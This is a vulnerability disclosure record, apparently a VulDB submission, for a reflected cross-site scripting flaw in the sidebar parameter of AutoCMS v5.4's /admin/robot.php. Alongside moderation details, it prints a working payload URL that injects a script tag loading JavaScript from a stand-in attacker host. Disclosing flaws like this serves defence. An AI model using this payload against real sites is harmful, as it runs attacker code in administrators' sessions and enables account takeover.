| Title | AutoCMS v5.4 Cross Site Scripting |
|---|---|
| Description | **Summary:** AutoCMS v5.4 was discovered to contain an XSS vulnerability via the `sidebar` parameter at `/admin/robot.php`.<br>**Affected Component:** `/admin/robot.php`<br>**Description:** The application fails to sufficiently sanitize and escape the input parameters `page` and `sidebar`. An attacker can craft a malicious URL that, when accessed by an administrator, will execute arbitrary JavaScript code.<br>**Payload:** `http(s)://target-ip/admin/robot.php?page=1&sidebar=1%22%3E%3CsCRiPt/SrC=//attack.com/1.js%3E` |
| Source | https://github.com/Hebing123/cve/issues/68 |
| User | jiashenghe (UID 39445) |
| Submission | 13/09/2024 05:22 (2 years ago) |
| Moderation | 14/09/2024 08:43 (1 day later) |
| Status | Accepted |
| VulDB entry | 277503 [AutoCMS 5.4 /admin/robot.php sidebar cross-site scripting] |
| Points | 20 |